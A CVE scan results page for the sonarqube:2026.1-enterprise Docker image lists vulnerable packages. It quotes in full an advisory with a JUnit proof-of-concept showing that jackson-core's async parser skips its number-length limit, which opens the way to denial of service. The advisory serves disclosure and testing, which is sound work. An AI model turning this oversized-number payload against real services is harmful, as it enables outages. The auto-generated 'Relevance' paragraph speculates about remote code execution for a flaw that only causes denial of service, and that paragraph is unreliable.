Scan Another

CVE Scan for sonarqube:2026.1-enterprise

Docker image vulnerability scanner

37 Known Vulnerabilities in this Docker Image

0
Critical
2
High
17
Medium
18
Low
0
Info/ Unspecified/ Unknown
CVE IDSeverityPackageAffected VersionFixed VersionCVSS Score
GHSA-72hv-8253-57qqhighjackson-core>=2.0.0,<=2.18.52.18.68.7

Summary

The non-blocking (async) JSON parser in jackson-core bypasses the maxNumberLength constraint (default: 1000 characters) defined in StreamReadConstraints. This allows an attacker to send JSON with arbitrarily long numbers through the async parser API, leading to excessive memory allocation and potential CPU exhaustion, resulting in a Denial of Service (DoS).

The standard synchronous parser correctly enforces this limit, but the async parser fails to do so, creating an inconsistent enforcement policy.

Details

The root cause is that the async parsing path in NonBlockingUtf8JsonParserBase (and related classes) does not call the methods responsible for number length validation.

  • The number parsing methods (e.g., _finishNumberIntegralPart) accumulate digits into the TextBuffer without any length checks.
  • After parsing, they call _valueComplete(), which finalizes the token but does not call resetInt() or resetFloat().
  • The resetInt()/resetFloat() methods in ParserBase are where the validateIntegerLength() and validateFPLength() checks are performed.
  • Because this validation step is skipped, the maxNumberLength constraint is never enforced in the async code path.

PoC

The following JUnit 5 test demonstrates the vulnerability. It shows that the async parser accepts a 5,000-digit number, whereas the limit should be 1,000.

package tools.jackson.core.unittest.dos;

import java.nio.charset.StandardCharsets;

import org.junit.jupiter.api.Test;

import tools.jackson.core.*;
import tools.jackson.core.exc.StreamConstraintsException;
import tools.jackson.core.json.JsonFactory;
import tools.jackson.core.json.async.NonBlockingByteArrayJsonParser;

import static org.junit.jupiter.api.Assertions.*;

/**
 * POC: Number Length Constraint Bypass in Non-Blocking (Async) JSON Parsers
 *
 * Authors: sprabhav7, rohan-repos
 * 
 * maxNumberLength default = 1000 characters (digits).
 * A number with more than 1000 digits should be rejected by any parser.
 *
 * BUG: The async parser never calls resetInt()/resetFloat() which is where
 * validateIntegerLength()/validateFPLength() lives. Instead it calls
 * _valueComplete() which skips all number length validation.
 *
 * CWE-770: Allocation of Resources Without Limits or Throttling
 */
class AsyncParserNumberLengthBypassTest {

    private static final int MAX_NUMBER_LENGTH = 1000;
    private static final int TEST_NUMBER_LENGTH = 5000;

    private final JsonFactory factory = new JsonFactory();

    // CONTROL: Sync parser correctly rejects a number exceeding maxNumberLength
    @Test
    void syncParserRejectsLongNumber() throws Exception {
        byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);
        
        // Output to console
        System.out.println("[SYNC] Parsing " + TEST_NUMBER_LENGTH + "-digit number (limit: " + MAX_NUMBER_LENGTH + ")");
        try {
            try (JsonParser p = factory.createParser(ObjectReadContext.empty(), payload)) {
                while (p.nextToken() != null) {
                    if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
                        System.out.println("[SYNC] Accepted number with " + p.getText().length() + " digits — UNEXPECTED");
                    }
                }
            }
            fail("Sync parser must reject a " + TEST_NUMBER_LENGTH + "-digit number");
        } catch (StreamConstraintsException e) {
            System.out.println("[SYNC] Rejected with StreamConstraintsException: " + e.getMessage());
        }
    }

    // VULNERABILITY: Async parser accepts the SAME number that sync rejects
    @Test
    void asyncParserAcceptsLongNumber() throws Exception {
        byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);

        NonBlockingByteArrayJsonParser p =
            (NonBlockingByteArrayJsonParser) factory.createNonBlockingByteArrayParser(ObjectReadContext.empty());
        p.feedInput(payload, 0, payload.length);
        p.endOfInput();

        boolean foundNumber = false;
        try {
            while (p.nextToken() != null) {
                if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
                    foundNumber = true;
                    String numberText = p.getText();
                    assertEquals(TEST_NUMBER_LENGTH, numberText.length(),
                        "Async parser silently accepted all " + TEST_NUMBER_LENGTH + " digits");
                }
            }
            // Output to console
            System.out.println("[ASYNC INT] Accepted number with " + TEST_NUMBER_LENGTH + " digits — BUG CONFIRMED");
            assertTrue(foundNumber, "Parser should have produced a VALUE_NUMBER_INT token");
        } catch (StreamConstraintsException e) {
            fail("Bug is fixed — async parser now correctly rejects long numbers: " + e.getMessage());
        }
        p.close();
    }

    private byte[] buildPayloadWithLongInteger(int numDigits) {
        StringBuilder sb = new StringBuilder(numDigits + 10);
        sb.append("{\"v\":");
        for (int i = 0; i < numDigits; i++) {
            sb.append((char) ('1' + (i % 9)));
        }
        sb.append('}');
        return sb.toString().getBytes(StandardCharsets.UTF_8);
    }
}

Impact

A malicious actor can send a JSON document with an arbitrarily long number to an application using the async parser (e.g., in a Spring WebFlux or other reactive application). This can cause:

  1. Memory Exhaustion: Unbounded allocation of memory in the TextBuffer to store the number's digits, leading to an OutOfMemoryError.
  2. CPU Exhaustion: If the application subsequently calls getBigIntegerValue() or getDecimalValue(), the JVM can be tied up in O(n^2) BigInteger parsing operations, leading to a CPU-based DoS.

Suggested Remediation

The async parsing path should be updated to respect the maxNumberLength constraint. The simplest fix appears to ensure that _valueComplete() or a similar method in the async path calls the appropriate validation methods (resetInt() or resetFloat()) already present in ParserBase, mirroring the behavior of the synchronous parsers.

NOTE: This research was performed in collaboration with rohan-repos

Relevance:

The CVE GHSA-72hv-8253-57qq could be relevant if the Docker Image `library/sonarqube:2026.1-enterprise` uses a vulnerable dependency or component affected by this security flaw. It might be critical in scenarios where the vulnerability allows remote code execution or unauthorized access, particularly if SonarQube is exposed to untrusted networks. Always verify if the specific version is impacted and apply patches if necessary. (Note: Relevance analysis is automatically generated and may require verification.)

Package URL(s):
  • pkg:maven/com.fasterxml.jackson.core/jackson-core@2.15.0
  • pkg:maven/com.fasterxml.jackson.core/jackson-core@2.17.2
  • pkg:maven/com.fasterxml.jackson.core/jackson-core@2.17.3
  • pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.2
  • pkg:maven/com.fasterxml.jackson.core/jackson-core@2.20.1
  • pkg:maven/tools.jackson.core/jackson-core@3.0.2
CVE-2025-55163highnetty-codec-http2>=4.2.0.Alpha1,<=4.2.3.Final4.2.4.Final8.2
CVE-2025-58057mediumnetty-codec-compression>=4.2.0.Alpha1,<4.2.5.Final4.2.5.Final6.9
CVE-2016-2781lowcoreutils>=0not fixed6.5
CVE-2025-68384mediumx-pack-security<8.19.98.19.96.5
CVE-2025-67735mediumnetty-codec-http>=4.2.0.Alpha1,<4.2.8.Final4.2.8.Final6.5
CVE-2025-48924mediumcommons-lang3>=3.0,<3.18.03.18.06.5
CVE-2025-68161mediumlog4j-core>=2.0-beta9,<2.25.32.25.36.3
CVE-2021-31879mediumwget>=0not fixed6.1
CVE-2025-11226mediumlogback-core>=1.4.0,<1.5.191.5.195.9

Severity Levels

Exploitation could lead to severe consequences, such as system compromise or data loss. Requires immediate attention.

Vulnerability could be exploited relatively easily and lead to significant impact. Requires prompt attention.

Exploitation is possible but might require specific conditions. Impact is moderate. Should be addressed in a timely manner.

Exploitation is difficult or impact is minimal. Address when convenient or as part of regular maintenance.

Severity is not determined, informational, or negligible. Review based on context.

Sliplane Icon
About Sliplane

Sliplane is a simple container hosting solution. It enables you to deploy your containers in the cloud within minutes and scale up as you grow.

Try Sliplane for free

About the CVE Scanner

What is a CVE?

CVE stands for Common Vulnerabilities and Exposures. It is a standardized identifier for known security vulnerabilities, allowing developers and organizations to track and address potential risks effectively. For more information, visit cve.mitre.org.

About the CVE Scanner

The CVE Scanner is a powerful tool that helps you identify known vulnerabilities in your Docker images. By scanning your images against a comprehensive database of Common Vulnerabilities and Exposures (CVEs), you can ensure that your applications are secure and up-to-date. For more details, checkout the NIST CVE Database.

How the CVE Scanner Works

The CVE Scanner analyzes your Docker images against a comprehensive database of known vulnerabilities. It uses Docker Scout under the hood to provide detailed insights into affected packages, severity levels, and available fixes, empowering you to take immediate action.

Why CVE Scanning is Essential for Your Docker Images

With the rise of supply chain attacks, ensuring the security of your applications has become more critical than ever. CVE scanning plays a vital role in identifying vulnerabilities that could be exploited by attackers, especially those introduced through dependencies and third-party components. Regularly scanning and securing your Docker images is essential to protect your applications from these evolving threats.

Benefits of CVE Scanning

  • Enhanced Security: Detect and mitigate vulnerabilities before they are exploited.
  • Compliance: Meet industry standards and regulatory requirements for secure software.
  • Proactive Maintenance: Stay ahead of potential threats by addressing vulnerabilities early.

The Importance of Patching Docker Images

Patching your Docker images is a critical step in maintaining the security and stability of your applications. By regularly updating your images to include the latest security patches, you can address known vulnerabilities and reduce the risk of exploitation. This proactive approach ensures that your applications remain resilient against emerging threats and helps maintain compliance with security best practices.

Want to deploy this image?

Try out Sliplane - a simple Docker hosting solution. It provides you with the tools to deploy, manage and scale your containerized applications.

Connect Github